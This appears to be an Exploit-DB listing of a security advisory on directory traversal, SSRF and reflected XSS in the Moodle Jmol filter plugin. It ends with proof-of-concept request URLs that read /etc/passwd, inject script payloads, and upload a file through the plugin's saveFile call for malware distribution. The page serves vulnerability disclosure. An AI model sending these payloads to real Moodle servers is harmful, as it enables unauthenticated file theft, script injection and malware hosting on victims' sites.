6d57564d7c
12 changes to exploits/shellcodes Deluge 1.3.15 - 'URL' Denial of Service (PoC) Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC) macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution
34 lines
No EOL
2.3 KiB
Text
34 lines
No EOL
2.3 KiB
Text
# Exploit Title: Moodle filter_jmol multiple vulnerabilities (Directory Traversal and XSS)
|
|
# Date: 20 May 2019
|
|
# Exploit Author: Dionach Ltd
|
|
# Exploit Author Homepage: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities
|
|
# Software Link: https://moodle.org/plugins/filter_jmol
|
|
# Version: <=6.1
|
|
# Tested on: Debian
|
|
|
|
The Jmol/JSmol plugin for the Moodle Learning Management System displays chemical structures in Moodle using Java and JavaScript. The plugin implements a PHP server-side proxy in order to load third party resources bypassing client-side security restrictions. This PHP proxy script calls the function file_get_contents() on unvalidated user input.
|
|
|
|
This makes Moodle instances with this plugin installed vulnerable to directory traversal and server-side request forgery in the default PHP setup, and if PHP's "expect" wrapper is enabled, also to remote code execution. Other parameters in the plugin are also vulnerable to reflected cross-site scripting. Note that authentication is not required to exploit these vulnerabilities.
|
|
|
|
The JSmol Moodle plugin was forked from the JSmol project, where the directory traversal and server-side request forgery vulnerability was partially fixed in 2015.
|
|
|
|
* Plugin: https://moodle.org/plugins/pluginversions.php?plugin=filter_jmol
|
|
* Note on functionality: https://github.com/geoffrowland/moodle-filter_jmol/blob/master/js/jsmol/php/jsmol.php#L14
|
|
* Vulnerability announcement: https://sourceforge.net/p/jmol/mailman/message/33627649/
|
|
* Partial fix: https://sourceforge.net/p/jsmol/code/1004/
|
|
|
|
This issue is tracked at the following URLs:
|
|
https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities
|
|
https://tracker.moodle.org/browse/CONTRIB-7516
|
|
|
|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
|
|
|
|
== Proof of Concept ==
|
|
|
|
1. Directory traversal
|
|
http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
|
|
2. Reflected cross-site scripting
|
|
http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html
|
|
http://<moodle>/filter/jmol/iframe.php?_USE=%22};alert(%27XSS%27);//
|
|
3. Malware distribution
|
|
http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&encoding=base64&data=UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D&filename=empty.zip |